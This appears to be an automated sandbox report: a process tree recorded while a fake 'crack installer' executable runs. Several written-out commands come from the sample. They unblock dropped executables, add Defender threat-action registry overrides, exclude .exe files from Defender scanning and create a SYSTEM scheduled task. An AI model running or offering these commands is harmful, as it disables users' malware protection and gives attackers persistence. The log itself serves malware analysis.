C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2024,7352388270336205163,8219541241851807050,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5512 /prefetch:12⤵PID:5108
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2024,7352388270336205163,8219541241851807050,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5912 /prefetch:12⤵PID:4520
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2024,7352388270336205163,8219541241851807050,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6172 /prefetch:82⤵PID:1232
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2024,7352388270336205163,8219541241851807050,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6172 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:5144
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2024,7352388270336205163,8219541241851807050,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3952 /prefetch:12⤵PID:5364
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2024,7352388270336205163,8219541241851807050,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6480 /prefetch:12⤵PID:5476
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2024,7352388270336205163,8219541241851807050,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5744 /prefetch:12⤵PID:5600
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2024,7352388270336205163,8219541241851807050,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3552 /prefetch:12⤵PID:6020
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2024,7352388270336205163,8219541241851807050,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2164 /prefetch:12⤵PID:2568
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2024,7352388270336205163,8219541241851807050,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=4832 /prefetch:82⤵PID:5316
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2024,7352388270336205163,8219541241851807050,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1688 /prefetch:12⤵PID:448
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2024,7352388270336205163,8219541241851807050,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6292 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:4132
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2024,7352388270336205163,8219541241851807050,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2620 /prefetch:12⤵PID:5960
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2024,7352388270336205163,8219541241851807050,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6916 /prefetch:12⤵PID:5920
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2024,7352388270336205163,8219541241851807050,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5656 /prefetch:12⤵PID:868
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2024,7352388270336205163,8219541241851807050,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7256 /prefetch:12⤵PID:6124
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2024,7352388270336205163,8219541241851807050,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1896 /prefetch:12⤵PID:1044
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2024,7352388270336205163,8219541241851807050,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1364 /prefetch:22⤵
- Suspicious behavior: EnumeratesProcesses
PID:1360
-
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:3676
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:3496
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:5108
-
C:\Users\Admin\Downloads\how-to-install-stylu_CmOTJyRsix\how-to-install-stylu_CmOTJyRsix.exe"C:\Users\Admin\Downloads\how-to-install-stylu_CmOTJyRsix\how-to-install-stylu_CmOTJyRsix.exe"1⤵PID:1132
-
C:\Users\Admin\AppData\Local\Temp\is-Q2BBG.tmp\how-to-install-stylu_CmOTJyRsix.tmp"C:\Users\Admin\AppData\Local\Temp\is-Q2BBG.tmp\how-to-install-stylu_CmOTJyRsix.tmp" /SL5="$20330,6296445,56832,C:\Users\Admin\Downloads\how-to-install-stylu_CmOTJyRsix\how-to-install-stylu_CmOTJyRsix.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
PID:2312 -
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\system32\schtasks.exe" /Delete /F /TN "K_Media_543"3⤵PID:5520
-
-
C:\Users\Admin\AppData\Local\kmedia\kmedia.exe"C:\Users\Admin\AppData\Local\kmedia\kmedia.exe" 6e61859bbcb75d4a8590e66dfb61f8803⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:4440 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4440 -s 8804⤵
- Program crash
PID:5900
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4440 -s 9204⤵
- Program crash
PID:5960
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4440 -s 9404⤵
- Program crash
PID:5400
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4440 -s 10884⤵
- Program crash
PID:3920
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4440 -s 10404⤵
- Program crash
PID:2848
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4440 -s 10404⤵
- Program crash
PID:4544
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4440 -s 11724⤵
- Program crash
PID:5152
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4440 -s 10404⤵
- Program crash
PID:5312
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4440 -s 11804⤵
- Program crash
PID:5788
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4440 -s 9164⤵
- Program crash
PID:5180
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4440 -s 13284⤵
- Program crash
PID:2564
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4440 -s 13924⤵
- Program crash
PID:5388
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4440 -s 15164⤵
- Program crash
PID:6008
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4440 -s 15364⤵
- Program crash
PID:5164
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4440 -s 16844⤵
- Program crash
PID:5772
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4440 -s 18724⤵
- Program crash
PID:1080
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://totrakto.com/how-to-install-stylus-rmx-crack.zip4⤵PID:5468
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffe39fc46f8,0x7ffe39fc4708,0x7ffe39fc47185⤵PID:5764
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4440 -s 15764⤵
- Program crash
PID:1088
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4440 -s 16084⤵
- Program crash
PID:4868
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4440 -s 16044⤵
- Program crash
PID:5416
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4440 -s 19324⤵
- Program crash
PID:2296
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4440 -s 11204⤵
- Program crash
PID:5860
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4440 -s 9164⤵
- Program crash
PID:5720
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4440 -s 19884⤵
- Program crash
PID:2348
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4440 -s 20164⤵
- Program crash
PID:2964
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4440 -s 20004⤵
- Program crash
PID:4748
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4440 -s 19844⤵
- Program crash
PID:4320
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4440 -s 13924⤵
- Program crash
PID:4204
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4440 -s 20324⤵
- Program crash
PID:2848
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4440 -s 16404⤵
- Program crash
PID:1572
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4440 -s 20004⤵
- Program crash
PID:2704
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4440 -s 15964⤵
- Program crash
PID:5780
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4440 -s 19844⤵
- Program crash
PID:5812
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4440 -s 16004⤵
- Program crash
PID:5408
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4440 -s 16644⤵
- Program crash
PID:4480
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4440 -s 21684⤵
- Program crash
PID:5280
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4440 -s 21964⤵
- Program crash
PID:404
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -Command "Unblock-File -Path C:\Users\Admin\AppData\Local\Temp\d3pdEIHF\Fdigx6RE2ZstV.exe"4⤵PID:5240
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Unblock-File -Path C:\Users\Admin\AppData\Local\Temp\d3pdEIHF\Fdigx6RE2ZstV.exe"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3192
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -Command "Unblock-File -Path C:\Users\Admin\AppData\Local\Temp\qewRBb4g\44716T2JF7jDy3mB.exe"4⤵PID:5388
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Unblock-File -Path C:\Users\Admin\AppData\Local\Temp\qewRBb4g\44716T2JF7jDy3mB.exe"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1580
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -Command "Unblock-File -Path C:\Users\Admin\AppData\Local\Temp\RX2iLIAc\Upy76WritOeZU.exe"4⤵PID:4068
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Unblock-File -Path C:\Users\Admin\AppData\Local\Temp\RX2iLIAc\Upy76WritOeZU.exe"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2836
-
-
-
C:\Users\Admin\AppData\Local\Temp\qewRBb4g\44716T2JF7jDy3mB.exeC:\Users\Admin\AppData\Local\Temp\qewRBb4g\44716T2JF7jDy3mB.exe4⤵
- Executes dropped EXE
PID:2588 -
C:\Users\Admin\AppData\Local\Temp\is-5AVAQ.tmp\44716T2JF7jDy3mB.tmp"C:\Users\Admin\AppData\Local\Temp\is-5AVAQ.tmp\44716T2JF7jDy3mB.tmp" /SL5="$6022A,3530239,54272,C:\Users\Admin\AppData\Local\Temp\qewRBb4g\44716T2JF7jDy3mB.exe"5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1484 -
C:\Users\Admin\AppData\Local\Audio Grail\audiograil32.exe"C:\Users\Admin\AppData\Local\Audio Grail\audiograil32.exe" -i6⤵
- Executes dropped EXE
PID:6044
-
-
C:\Users\Admin\AppData\Local\Audio Grail\audiograil32.exe"C:\Users\Admin\AppData\Local\Audio Grail\audiograil32.exe" -s6⤵
- Executes dropped EXE
PID:5420
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\d3pdEIHF\Fdigx6RE2ZstV.exeC:\Users\Admin\AppData\Local\Temp\d3pdEIHF\Fdigx6RE2ZstV.exe /sid=3 /pid=394⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
PID:5400
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4440 -s 16404⤵
- Program crash
PID:4612
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -Command "Unblock-File -Path C:\Users\Admin\AppData\Local\Temp\MRB4foRz\AczmJ.exe"4⤵PID:5828
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Unblock-File -Path C:\Users\Admin\AppData\Local\Temp\MRB4foRz\AczmJ.exe"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:6000
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4440 -s 21804⤵
- Program crash
PID:3884
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -Command "Unblock-File -Path C:\Users\Admin\AppData\Local\Temp\Ch3TN7iP\mL58FJENjTIb9.exe"4⤵PID:5404
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Unblock-File -Path C:\Users\Admin\AppData\Local\Temp\Ch3TN7iP\mL58FJENjTIb9.exe"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1208
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4440 -s 22364⤵
- Program crash
PID:5108
-
-
C:\Users\Admin\AppData\Local\Temp\MRB4foRz\AczmJ.exeC:\Users\Admin\AppData\Local\Temp\MRB4foRz\AczmJ.exe /did=757674 /S4⤵
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Enumerates system info in registry
PID:5496 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"5⤵PID:6112
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"6⤵PID:1388
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 67⤵PID:548
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 68⤵PID:5312
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"6⤵PID:4500
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 67⤵PID:1980
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 68⤵PID:5944
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"6⤵PID:4644
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 67⤵PID:2356
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 68⤵PID:4184
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"6⤵PID:1700
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 67⤵PID:4432
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 68⤵PID:5852
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"6⤵PID:4640
-
C:\Windows\SysWOW64\cmd.exe/C powershell start-process -WindowStyle Hidden gpupdate.exe /force7⤵PID:3996
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell start-process -WindowStyle Hidden gpupdate.exe /force8⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4256 -
C:\Windows\SysWOW64\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force9⤵PID:3856
-
-
-
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"5⤵PID:2608
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵PID:5828
-
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True6⤵PID:5372
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5700 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True8⤵
- Suspicious use of AdjustPrivilegeToken
PID:4256
-
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bSfPZYmEQVWJjHQXDZ" /SC once /ST 01:21:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\MRB4foRz\AczmJ.exe\" fM /YJrdidztiA 757674 /S" /V1 /F5⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:4192
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m waitfor.exe /c "cmd /C schtasks /run /I /tn bSfPZYmEQVWJjHQXDZ"5⤵PID:5788
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵PID:1700
-
-
C:\Windows\SysWOW64\cmd.exe/C schtasks /run /I /tn bSfPZYmEQVWJjHQXDZ6⤵PID:2024
-
\??\c:\windows\SysWOW64\schtasks.exeschtasks /run /I /tn bSfPZYmEQVWJjHQXDZ7⤵PID:5452
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RX2iLIAc\Upy76WritOeZU.exeC:\Users\Admin\AppData\Local\Temp\RX2iLIAc\Upy76WritOeZU.exe --silent --allusers=04⤵
- Executes dropped EXE
- Loads dropped DLL
- Enumerates connected drives
- Modifies system certificate store
PID:2808 -
C:\Users\Admin\AppData\Local\Temp\RX2iLIAc\Upy76WritOeZU.exeC:\Users\Admin\AppData\Local\Temp\RX2iLIAc\Upy76WritOeZU.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.68 --initial-client-data=0x2b4,0x2b8,0x2bc,0x290,0x2c0,0x6e34e1d0,0x6e34e1dc,0x6e34e1e85⤵
- Executes dropped EXE
- Loads dropped DLL
PID:4508
-
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\Upy76WritOeZU.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\Upy76WritOeZU.exe" --version5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:4612
-
-
